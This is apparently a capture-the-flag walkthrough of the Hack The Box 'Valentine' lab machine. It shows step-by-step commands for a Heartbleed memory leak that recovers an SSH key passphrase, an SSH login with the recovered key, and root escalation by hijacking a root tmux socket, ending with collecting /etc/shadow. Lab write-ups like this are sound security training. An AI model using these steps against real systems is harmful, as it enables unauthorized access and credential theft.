Again, we start with nmap -sC -sV -Pn -p- -oA ./Valentine 10.10.10.79
We've got SSH, HTTP, and HTTP on all their standard ports. Since Gobuster gets testy with self-signed certificates, let's go with Dirbuster on this one. While that's running, and as a guess from the timing and name of the box, let's also run the Heartbleed nmap script to check if it's vulnerable.
We have officially confirmed that this is a Heartbleed box and the Dirbuster looks to have found a "hype_key" for an ssh login. Running the heartbleed python script found here, and we have to run it several times, we finally get a valid base64 string. I eventually ran it as:
sudo python heartbleed-poc.py 10.10.10.79 443 -f /home/kali/Desktop/Valentine/heartpoc.bin -n 35
and then ran strings on the resulting bin file
$ strings heartpoc.bin
<<<SNIPPED FOR BREVITY>>>
<<<SNIPPED FOR BREVITY>>>
And there it is. $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
$ echo aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== | base64 -d
We have a passphrase. Navigate to https://10.10.10.79/dev/hype_key and copy that to your machine. You can do the same with /dev/notes.txt if you would like. Both are in Sub-Nodes of the Dirb/Dirbuster Node in the CTB file. Now, we have to convert the hype_key from the HEX format that it is in over to a normal RSA keyformat (which in this case is just a hex to text). We can do that easily.
Paste the HEX string from https://10.10.10.79/dev/hype_key into a hype_key.hex file
$ cat hype_key.hex | xxd -r -p > hype_key
$ cat hype_key (just for verification)
$ chmod 400 hype_key
$ ssh -i hype_key firstname.lastname@example.org
Enter passphrase for key 'hype_key': heartbleedbelievethehype
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)
* Documentation: https://help.ubuntu.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
And again, the original HEX, the corrected Key, the nmap outputs, the notes.txt file, and the ps aux output will all be in the CTB file for your enjoyment.
Which brings me to the next part of this box's journey. LinEnum the box. There's a faster way (just run ps aux), but LinEnum (on line 642 to be exact) shows you the EXACT same info as ps aux for the privesc point and some form of Privesc Checker is a good practice to be in. Yes, I know. Reading umpteenmillion lines of mostly useless info is as boring as listening to grass grow while reading stereo instructions and simultaneously watching paint dry, but TRUST ME it's better than banging your head against a wall during a real test because you manually checked sudo -l and ps aux and all that jazz but missed a SUID set or funky config file permission set.
Ok. Now that I'm done ranting, there's a tmux session bring run as root! Think of tmux as "screen" but with more features. Personally, I still use screen, but that's because I'm "old" (in terms of IT anyway lol) and stubborn in my ways. If it ain't broke, don't fix it and remember to get off my lawn! Seriously though, tmux allows a session to stay active even if the user has to log off (just like screen does). We should be able to hijack/resume that session with:
tmux -S /.devs/dev_sess
And we've successfully done that. Grab your flags, ifconfig, and /etc/shadow file (good practice to get into if you're wanting to take the OSCP [which I haven't yet]) and you can safely say that this box is done and in the books.